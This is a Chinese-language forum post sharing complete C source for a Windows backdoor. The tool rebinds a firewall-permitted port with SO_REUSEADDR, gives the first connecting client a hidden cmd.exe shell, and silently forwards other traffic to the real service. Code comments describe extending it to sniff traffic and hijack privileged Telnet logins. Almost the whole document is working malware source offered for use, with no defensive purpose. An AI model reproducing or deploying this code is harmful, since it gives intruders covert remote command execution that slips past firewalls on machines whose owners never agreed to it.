端口重绑定后门工具源代码

猪猪

信息来源：dahubaobao

端口复用相关资料

1. /*
   
2. ***********************************************************
   
3. 端口重绑定后门工具
   
4. 原理：通过把端口重绑定到防火墙开放的端口实现穿越防火墙的功能
   
5. 感谢：wineggdrop（还有一位不知道名字，本程序主干修改自他的代码）
   
6. 用途：当防火墙BT到连反向连接到封闭时，可以尝试一下这个
   
7. 留言：其实我也是脚本小子，我只是把两位大虾的代码合并在一齐而已
   
8.     了，自己写的不过10行。其实还有一个svchost.exe的功能是一样
   
9.     过我发现那个不好使，所以就写了这个。
   
10. ***********************************************************
    
11. */
    
12. #include "stdafx.h"
    
13. #include <winsock2.h>
    
14. #include <windows.h>
    
15. #include <stdio.h>
    
16. #include <stdlib.h>
    
17. #pragma comment(lib, "ws2_32.lib")
    
18. 
    
19. DWORD WINAPI ClientThread(LPVOID lpParam);//原端口转发
    
20. DWORD WINAPI ServerThread(LPVOID lpParam);//CMDSHELL线程，抄写自wineggdrop
    
21. 
    
22. unsigned int port=21;//重绑定端口
    
23. BOOL Connected;
    
24. 
    
25. //************抄写自wineggdrop的代码***************
    
26. 
    
27. unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,unsigned int BufferSize)
    
28. {
    
29. ZeroMemory(Buffer,BufferSize);     // Reset The Buffer
    
30. 
    
31. if (BufferSize < 2)     // Buffer Size Is Less Then 2
    
32. {
    
33.     return 0;     // Dump
    
34. }
    
35. 
    
36. unsigned int CharacterCount = 0;     
    
37. 
    
38. while(TRUE)
    
39. {
    
40.   if (CharacterCount >= BufferSize)     // The Characters Received Is Bigger Or Equal The Buffer Size
    
41.   {
    
42.       // Give The Buffer An Enter
    
43.       Buffer[BufferSize-2] = '\r';
    
44.       Buffer[BufferSize-1] = '\n';
    
45.       return CharacterCount;     // Return The Characters Received
    
46.   }
    
47. 
    
48.   if (recv(ClientSocket,Buffer+CharacterCount,1,0) == SOCKET_ERROR)     // Fail To Receive Data
    
49.   {
    
50.       return SOCKET_ERROR;     // Return Error
    
51.   }
    
52. 
    
53.   if (Buffer[CharacterCount] == '\b')     // Back Space Detected
    
54.   {
    
55.       Buffer[CharacterCount] = '\0';     // Skip It
    
56.       if (CharacterCount > 0)     // Characters Received Is Bigger Than 0
    
57.       {
    
58.         CharacterCount--;     // Decrease One Character
    
59.         Buffer[CharacterCount] = '\0';
    
60.       }
    
61.       continue;     // Begin A New Loop
    
62.   }
    
63. 
    
64.   if (Buffer[CharacterCount++] == '\n')     // Enter Is Detected
    
65.   {
    
66.       return CharacterCount;     // Return The Characters Received
    
67.   }
    
68. }
    
69. return 0;
    
70. }
    
71. 
    
72. BOOL SendSocket(const SOCKET ClientSocket,const char *Message)
    
73. {
    
74. return (send(ClientSocket,Message,strlen(Message),0)!=SOCKET_ERROR);
    
75. }
    
76. 
    
77. //***********抄写结束*******
    
78. 
    
79. int usage(char * appname)
    
80. {
    
81.   printf("%s 端口重绑定后门工具\n"
    
82.     "使用方法：%s [重绑定端口(可选，默认是80)] \n",appname,appname);
    
83.   exit(0);
    
84. }
    
85. 
    
86. int main(int argc, char* argv[])
    
87. {
    
88. 
    
89. WORD wVersionRequested;
    
90. DWORD ret;
    
91. WSADATA wsaData;
    
92. BOOL val;
    
93. SOCKADDR_IN saddr;
    
94. SOCKADDR_IN scaddr;
    
95. int err;
    
96. SOCKET s;
    
97. SOCKET sc;
    
98. int caddsize;
    
99. HANDLE mt;
    
100. DWORD tid;
     
101. 
     
102. Connected=FALSE;
     
103. 
     
104. if (argc!=1)
     
105.   port=atoi(argv[1]);
     
106. 
     
107. printf("[i]Startup.....\n");
     
108. 
     
109. wVersionRequested = MAKEWORD( 2, 2 );
     
110. err = WSAStartup( wVersionRequested, &wsaData );
     
111. if ( err != 0 ) {
     
112. printf("[-]WSAStartup failed!\n");
     
113. return -1;
     
114. }
     
115. saddr.sin_family = AF_INET;
     
116. 
     
117. //截听虽然也可以将地址指定为INADDR_ANY，
     
118. //但是要不能影响正常应用情况下，
     
119. //应该指定具体的IP，留下127.0.0.1给正常的服务应用，
     
120. //然后利用这个地址进行转发，
     
121. //就可以不影响对方正常应用了
     
122. printf("[i]Bind.....\n");
     
123. 
     
124. //*********以下代码抄写自wineggdrop**********
     
125. 
     
126. char FAR name[255];
     
127. gethostname(name, 255);//获得主机名
     
128. struct hostent FAR * pHostent;     
     
129. pHostent = (struct hostent * )malloc(sizeof(struct hostent));
     
130. pHostent = gethostbyname(name);//获得IP
     
131. memcpy(&saddr.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length); //复制IP
     
132. 
     
133. //**********抄写结束*************
     
134. 
     
135. 
     
136. 
     
137. saddr.sin_port = htons(port);
     
138. if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
     
139. {
     
140. printf("[-]socket failed!\n");
     
141. return -1;
     
142. }
     
143. val = TRUE;
     
144. 
     
145. //********以下代码修改自......不知道是谁，反正不是我原创的*********
     
146. 
     
147. //SO_REUSEADDR选项就是可以实现端口重绑定的
     
148. if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
     
149. {
     
150. printf("[-]setsockopt failed!\n");
     
151. return -1;
     
152. }
     
153. //如果指定了SO_EXCLUSIVEADDRUSE，
     
154. //就不会绑定成功，返回无权限的错误代码；
     
155. //如果是想通过重利用端口达到隐藏的目的，
     
156. //就可以动态的测试当前已绑定的端口哪个可以成功，
     
157. //就说明具备这个漏洞，然后动态利用端口使得更隐蔽
     
158. if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
     
159. {
     
160. ret=GetLastError();
     
161. printf("[-]bind failed!\n");
     
162. return -1;
     
163. }
     
164. 
     
165. while(1)
     
166. {
     
167. caddsize = sizeof(scaddr);
     
168. //接受连接请求
     
169. printf("[+]Listening.....\n");
     
170. listen(s,5);
     
171. sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
     
172. printf("[+]Someone connect port %d\n",port);
     
173. if(sc!=INVALID_SOCKET)
     
174. {
     
175. if(Connected)
     
176. {
     
177. mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);//原端口转发
     
178. printf("[+]%d -> %d Thread Created!\n",port,port);
     
179. }
     
180. else
     
181. {
     
182. mt = CreateThread(NULL,0,ServerThread,(LPVOID)sc,0,&tid);//重定向线程
     
183. printf("[+] CMDShell Thread Created!\n");
     
184. Connected=TRUE;
     
185. }
     
186. if(mt==NULL)
     
187. {
     
188. printf("Thread Creat Failed!\n");
     
189. break;
     
190. }
     
191. }
     
192. CloseHandle(mt);
     
193. }
     
194. closesocket(s);
     
195. WSACleanup();
     
196. return 0;
     
197. }
     
198. 
     
199. DWORD WINAPI ClientThread(LPVOID lpParam)//原端口转发
     
200. {
     
201. SOCKET ss = (SOCKET)lpParam;
     
202. SOCKET sc;
     
203. char buf[4096];
     
204. SOCKADDR_IN saddr;
     
205. long num;
     
206. DWORD val;
     
207. DWORD ret;
     
208. 
     
209. //如果是隐藏端口应用的话，
     
210. //可以在此处加一些判断
     
211. //如果是自己的包，就可以进行一些特殊处理，
     
212. //不是的话通过127.0.0.1进行转发
     
213. 
     
214. saddr.sin_family = AF_INET;
     
215. saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
     
216. saddr.sin_port = htons(port);
     
217. if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
     
218. {
     
219. printf("error!socket failed!\n");
     
220. return -1;
     
221. }
     
222. val = 100;
     
223. if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
     
224. {
     
225. ret = GetLastError();
     
226. return -1;
     
227. }
     
228. if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
     
229. {
     
230. ret = GetLastError();
     
231. return -1;
     
232. }
     
233. if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
     
234. {
     
235. printf("error!socket connect failed!\n");
     
236. closesocket(sc);
     
237. closesocket(ss);
     
238. return -1;
     
239. }
     
240. while(1)
     
241. {
     
242. //下面的代码主要是实现通过127。0。0。1
     
243. //这个地址把包转发到真正的应用上，
     
244. //并把应答的包再转发回去。
     
245. //如果是嗅探内容的话，
     
246. //可以再此处进行内容分析和记录
     
247. //如果是攻击如TELNET服务器，
     
248. //利用其高权限登陆用户的话，
     
249. //可以分析其登陆用户，
     
250. //然后利用发送特定的包以劫持的用户身份执行。
     
251. num = recv(ss,&(buf[0]),4096,0);
     
252. if(num>0)
     
253. send(sc,buf,num,0);
     
254. else if(num==0)
     
255. break;
     
256. num = recv(sc,buf,4096,0);
     
257. if(num>0)
     
258. send(ss,buf,num,0);
     
259. else if(num==0)
     
260. break;
     
261. }
     
262. closesocket(ss);
     
263. closesocket(sc);
     
264. return 0 ;
     
265. }
     
266. 
     
267. DWORD WINAPI ServerThread(LPVOID lpParam)//重定向线程
     
268. {
     
269. SOCKET ListenSocket = (SOCKET)lpParam;
     
270. 
     
271. //**************除上面一句是自己的，下面的都是wineggdrop的代码:)******
     
272. 
     
273. char ReceiveBuffer[MAX_PATH + 1];     // The Receive Buffer
     
274. char SendBuffer[1024 * 4];     // The Send Buffer
     
275. 
     
276. unsigned long OutputLength,InputLength;     // The Input And Output Length
     
277. 
     
278. // The Pipe And Some Other Sutff
     
279. HANDLE ClientReadPipe = NULL;     
     
280. HANDLE ClientWritePipe = NULL;
     
281. HANDLE CmdWritePipe = NULL;
     
282. HANDLE CmdReadPipe = NULL;
     
283. 
     
284. SECURITY_ATTRIBUTES sa           = {0};
     
285. STARTUPINFO       si           = {0};
     
286. PROCESS_INFORMATION pi           = {0};
     
287. 
     
288. ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));
     
289. 
     
290. if (GetSystemDirectory(ReceiveBuffer,MAX_PATH))     // Get System Directory
     
291. {
     
292.   strcat(ReceiveBuffer,"\\cmd.exe");     // Get The Cmd.exe Full Path
     
293. }
     
294. else     // Fail To Get System Directory
     
295. {
     
296.   SendSocket(ListenSocket,"Fail To Get System Diretory\r\n");     // Display Error Message
     
297.   return FALSE;     // Return
     
298. }
     
299. 
     
300. // Initize The Stuff
     
301. sa.nLength = sizeof(sa);
     
302. sa.bInheritHandle = TRUE;
     
303. sa.lpSecurityDescriptor = NULL;
     
304. memset(&pi,0,sizeof(pi));
     
305. 
     
306. if (!CreatePipe(&ClientReadPipe,&CmdWritePipe,&sa,0))     // Fail To Create Client Read Pipe
     
307. {
     
308.   SendSocket(ListenSocket,"Fail To Create Client Read Pipe\r\n");     // Display Error Message
     
309.   goto CleanUP;     // Leave
     
310. }
     
311. 
     
312. if (!CreatePipe(&CmdReadPipe,&ClientWritePipe,&sa,0))     // Fail To Create Cmd Read Pipe
     
313. {
     
314.   SendSocket(ListenSocket,"Fail To Create CMD Read Pipe\r\n");     // Display Error Message
     
315.   goto CleanUP;     // Leave
     
316. }
     
317. 
     
318. // Reset And Initize Stuff
     
319. memset((void *)&si,0,sizeof(si));
     
320. memset((void *)&pi,0,sizeof(pi));
     
321. si.cb = sizeof(si);
     
322. si.dwFlags   = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
     
323. si.wShowWindow = SW_HIDE;
     
324. 
     
325. si.hStdInput = CmdReadPipe;     // Pass The CmdReadPipe To StdInput
     
326. si.hStdError = CmdWritePipe;     // Pass The CmdWritePipe To StdError
     
327. si.hStdOutput = CmdWritePipe;     // Pass The CmdWritePipe To StdOutput
     
328. 
     
329. if (!CreateProcess(ReceiveBuffer,NULL,NULL,NULL,1,0,NULL, NULL,&si,&pi))     // Fail To Create A Cmd Shell Process
     
330. {
     
331.   SendSocket(ListenSocket,"Fail To Create Process\r\n");     // Display Error Message
     
332.   goto CleanUP;     // Leave
     
333. }
     
334. 
     
335. while(TRUE)     // Shell Commincation Starts Here
     
336. {
     
337.   if (!PeekNamedPipe(ClientReadPipe,SendBuffer,sizeof(SendBuffer),&OutputLength,NULL,NULL))     // Fail To Get Data From The Pipe
     
338.   {
     
339.       SendSocket(ListenSocket,"Fail To Peek Name Pipe\r\n");     // Display Error Message
     
340.       break;     // Leave
     
341.   }
     
342.   if (OutputLength > 0)     // Get Data From The Pipe Successfully
     
343.   {
     
344.       ZeroMemory(SendBuffer,sizeof(SendBuffer));     // Reset The Send Buffer
     
345.       if (!ReadFile(ClientReadPipe,SendBuffer,OutputLength,&OutputLength,0))     //Fail To Read The Data
     
346.       {
     
347.         SendSocket(ListenSocket,"Fail To Read File\r\n");     // Display Error Message
     
348.         break;     // Leave
     
349.       }
     
350.       if (send(ListenSocket,SendBuffer,OutputLength,0) == SOCKET_ERROR)     // Fail To Send The Data
     
351.       {
     
352.         printf("Fail To Send Buffer\n");     // Display Error Message
     
353.         break;     // Leave
     
354.       }
     
355.   }
     
356.   else
     
357.   {
     
358.       ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));     // Reset Receive Buffer
     
359.       InputLength = ReceiveMessageFromSocket(ListenSocket, ReceiveBuffer, sizeof(ReceiveBuffer));     // Receive Input From Client
     
360.       if (InputLength == SOCKET_ERROR)     // Fail To Receive Data
     
361.       {
     
362.         printf("Fail To Receive Buffer\n");     // Display Error Message
     
363.         break;     // Leave
     
364.       }
     
365. 
     
366.       if (!WriteFile(ClientWritePipe,ReceiveBuffer,InputLength,&InputLength,0))     // Fail To Write The Received Data To The Pipe
     
367.       {
     
368.         printf("Fail To Write File\n");     // Display Error Message
     
369.         break;     // Leave
     
370.       }
     
371. 
     
372.       // Leave The Shell
     
373.       if (strnicmp((char*)ReceiveBuffer, "exit\r\n", 6) == 0 || strnicmp((char*)ReceiveBuffer, "exit\r", 5)==0 || strnicmp((char*)ReceiveBuffer, "exit\n", 5)==0)
     
374.         break;
     
375.   }
     
376. }
     
377. 
     
378. // Clean All Resource Allocated
     
379. CleanUP:
     
380.     if (CmdReadPipe != NULL)
     
381.       CloseHandle(CmdReadPipe);
     
382.     if (CmdWritePipe != NULL)
     
383.       CloseHandle(CmdWritePipe);
     
384.     if (ClientReadPipe != NULL)
     
385.       CloseHandle(ClientReadPipe);
     
386.     if (ClientWritePipe)
     
387.       CloseHandle(ClientWritePipe);
     
388. 
     
389. 
     
390.   Connected=FALSE;
     
391.   
     
392.   return 0;
     
393. }

复制代码